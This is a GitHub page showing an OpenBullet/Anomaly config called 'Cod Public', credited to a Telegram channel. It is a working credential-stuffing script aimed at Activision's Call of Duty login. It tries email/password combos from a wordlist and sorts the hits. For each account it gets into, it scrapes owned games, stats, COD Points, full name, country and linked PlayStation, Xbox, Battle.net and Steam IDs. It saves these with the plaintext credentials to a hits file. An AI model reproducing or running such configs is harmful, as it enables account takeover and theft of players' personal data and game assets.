forked from WangLee112/Config-Open-Bullet
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Cod Public.anom
203 lines (167 loc) · 7.84 KB
/
Cod Public.anom
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
[SETTINGS]
{
"Name": "Cod Public",
"SuggestedBots": 85,
"MaxCPM": 0,
"LastModified": "2021-04-09T19:57:36.630878+04:30",
"AdditionalInfo": "Telegram Channel: https://t.me/OpenBulletChannel",
"Author": "@Hogo_Victor",
"Version": "1.4.4 [Anomaly]",
"IgnoreResponseErrors": false,
"MaxRedirects": 8,
"NeedsProxies": false,
"OnlySocks": false,
"OnlySsl": false,
"MaxProxyUses": 0,
"BanProxyAfterGoodStatus": false,
"EncodeData": false,
"AllowedWordlist1": "MailPass",
"AllowedWordlist2": "",
"DataRules": [],
"CustomInputs": [],
"CaptchaUrl": "",
"Base64": "",
"Grayscale": false,
"RemoveLines": false,
"RemoveNoise": false,
"Dilate": false,
"Threshold": 1.0,
"DiffKeep": 0.0,
"DiffHide": 0.0,
"Saturate": false,
"Saturation": 0.0,
"Transparent": false,
"Contour": false,
"OnlyShow": false,
"ContrastGamma": false,
"Contrast": 1.0,
"Gamma": 1.0,
"Brightness": 1.0,
"RemoveLinesMin": 0,
"RemoveLinesMax": 0,
"Crop": false,
"ForceHeadless": false,
"AlwaysOpen": false,
"AlwaysQuit": false,
"DisableNotifications": false,
"CustomUserAgent": "",
"RandomUA": false,
"CustomCMDArgs": ""
}
[SCRIPT]
#Get REQUEST GET "https://s.activision.com/activision/login"
HEADER "Host: s.activision.com"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0"
HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
HEADER "Accept-Language: en-US,en;q=0.5"
HEADER "Accept-Encoding: gzip, deflate"
HEADER "Connection: close"
HEADER "Upgrade-Insecure-Requests: 1"
#Login REQUEST POST "https://s.activision.com/do_login?new_SiteId=activision" EncodeContent=TRUE
CONTENT "username=<USER>&remember_me=true&password=<PASS>&_csrf=<COOKIES(XSRF-TOKEN)>"
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "Host: s.activision.com"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0"
HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
HEADER "Accept-Language: en-US,en;q=0.5"
HEADER "Accept-Encoding: gzip, deflate"
HEADER "Content-Type: application/x-www-form-urlencoded"
HEADER "Origin: https://s.activision.com"
HEADER "Connection: close"
HEADER "Referer: https://s.activision.com/activision/login"
KEYCHECK
KEYCHAIN Success OR
KEY "<COOKIES(atkn)>" Exists
KEY "<COOKIES(ACT_SSO_EVENT)>" Contains "LOGIN_SUCCESS"
KEYCHAIN Failure OR
KEY "You have entered an invalid email / password combination."
KEY "<COOKIES(ACT_SSO_EVENT)>" Contains "LOGIN_FAILURE"
KEYCHAIN Ban OR
KEY "<RESPONSECODE>" EqualTo "403"
#Get REQUEST GET "https://my.callofduty.com/api/papi-client/crm/cod/v2/identities/<COOKIES(ACT_SSO_COOKIE)>"
HEADER "Host: my.callofduty.com"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0"
HEADER "Accept: application/json, text/javascript, */*; q=0.01"
HEADER "Accept-Language: en-US,en;q=0.5"
HEADER "Accept-Encoding: gzip, deflate"
HEADER "X-Requested-With: XMLHttpRequest"
HEADER "Connection: close"
HEADER "Referer: https://my.callofduty.com/login"
#game PARSE "<SOURCE>" LR "title\":\"" "\"" Recursive=TRUE -> VAR "game"
KEYCHECK BanOnToCheck=FALSE
KEYCHAIN Custom "FREE" OR
KEY "<SOURCE>" DoesNotContain "title\":\""
#Games FUNCTION Translate StopAfterFirstMatch=FALSE
KEY "bo4" VALUE "BLACK OPS4"
KEY "mw" VALUE "MODERN WARFARE"
KEY "cw" VALUE "BLACK OPS COLD WAR"
KEY "wwii" VALUE "WWII"
"<game>" -> CAP "Games"
#platforms PARSE "<SOURCE>" LR "platform\":\"" "\"" Recursive=TRUE -> VAR "platforms"
#platform PARSE "<SOURCE>" LR "platform\":\"" "\"" -> VAR "platform"
#Platforms FUNCTION Translate StopAfterFirstMatch=FALSE
KEY "xbl" VALUE "XBOX"
KEY "battle" VALUE "BLLIZARD"
"<platforms>" -> CAP "Platforms"
#Username PARSE "<SOURCE>" LR "username\":\"" "\"" -> VAR "Username"
#Encode_Username FUNCTION URLEncode "<Username>" -> VAR "Encode Username"
#Get REQUEST GET "https://my.callofduty.com/api/papi-client/stats/cod/v1/title/mw/platform/<platform>/gamer/<Encode Username>/profile/type/mp"
HEADER "Host: my.callofduty.com"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0"
HEADER "Accept: application/json, text/javascript, */*; q=0.01"
HEADER "Accept-Language: en-US,en;q=0.5"
HEADER "Accept-Encoding: gzip, deflate"
HEADER "X-Requested-With: XMLHttpRequest"
HEADER "Connection: close"
HEADER "Referer: https://my.callofduty.com/login"
#Level PARSE "<SOURCE>" LR "\"level\":" "," CreateEmpty=FALSE -> CAP "Level"
#Wins PARSE "<SOURCE>" LR "\"wins\":" "," CreateEmpty=FALSE -> CAP "Wins"
#Kills PARSE "<SOURCE>" LR "\"kills\":" "," CreateEmpty=FALSE -> CAP "Kills"
#Get REQUEST GET "https://my.callofduty.com/api/papi-client/inventory/v1/title/cw/platform/<platform>/gamer/<Encode Username>/currency"
HEADER "Host: my.callofduty.com"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0"
HEADER "Accept: application/json, text/javascript, */*; q=0.01"
HEADER "Accept-Language: en-US,en;q=0.5"
HEADER "Accept-Encoding: gzip, deflate"
HEADER "X-Requested-With: XMLHttpRequest"
HEADER "Connection: close"
HEADER "Referer: https://my.callofduty.com/dashboard"
#CP_|codPoints| PARSE "<SOURCE>" LR "codPoints\":" "}" CreateEmpty=FALSE -> CAP "CP |codPoints|"
#Get REQUEST GET "https://profile.callofduty.com/cod/profile"
HEADER "Host: profile.callofduty.com"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0"
HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
HEADER "Accept-Language: en-US,en;q=0.5"
HEADER "Accept-Encoding: gzip, deflate"
HEADER "Connection: close"
HEADER "Referer: https://my.callofduty.com/dashboard"
#Full_Name PARSE "<SOURCE>" LR "<p class=\"personalInfoDisplay\">" "</p>" CreateEmpty=FALSE -> CAP "Full Name"
#Activision_ID PARSE "<SOURCE>" LR "<span class=\"forum-name\">" "</span>" CreateEmpty=FALSE -> CAP "Activision ID"
#country PARSE "<SOURCE>" LR "<span class=\"country\">" "</span>" -> VAR "country"
#Country FUNCTION Replace "<span class=\"country\">" "" "<country>" -> CAP "Country"
#L1 PARSE "<SOURCE>" LR "Playstation Account: " "</span>" -> VAR "L1"
#L2 PARSE "<SOURCE>" LR "Battle.net Account: " "</span>" -> VAR "L2"
#L3 PARSE "<SOURCE>" LR "XBOX Live Account: " "</span>" -> VAR "L3"
#L4 PARSE "<SOURCE>" LR "Steam Account: " "</span>" -> VAR "L4"
IF "<L1>" EqualTo ""
SET CAP "Playstation Linked" "Not Linked"
ELSE
SET CAP "Playstation Linked" "Linked |ID:<L1>|"
ENDIF
IF "<L2>" EqualTo ""
SET CAP "Bllizard Linked" "Not Linked"
ELSE
SET CAP "Bllizard Linked" "Linked |ID:<L2>|"
ENDIF
IF "<L3>" EqualTo ""
SET CAP "XBOX Linked" "Not Linked"
ELSE
SET CAP "XBOX Linked" "Linked |ID:<L3>|"
ENDIF
IF "<L4>" EqualTo ""
SET CAP "Steam Linked" "Not Linked"
ELSE
SET CAP "Steam Linked" "Linked |ID:<L4>|"
ENDIF
#Telegram_Channel FUNCTION Constant "https://t.me/OpenBulletChannel" -> CAP "Telegram Channel"
#Save UTILITY File "CALL OF DUTY.txt" Append "<USER>:<PASS>\\nGames:<Games>\\nPlatforms:<Platforms>\\nLevel:<Level>\\nWins:<Wins>\\nKills:<Kills>\\nCP |codPoints|:<CP |codPoints|>\\nFull Name:<Full Name>\\nActivision ID:<Activision ID>\\nCountry:<Country>\\nPlaystation Linked:<Playstation Linked>\\nBllizard Linked:<Bllizard Linked>\\nXBOX Linked:<XBOX Linked>\\nSteam Linked:<Steam Linked>\\nTelegram Channel:@OpenBulletChannel\\n--------------------------------------------------------\\n" -> VAR "Save"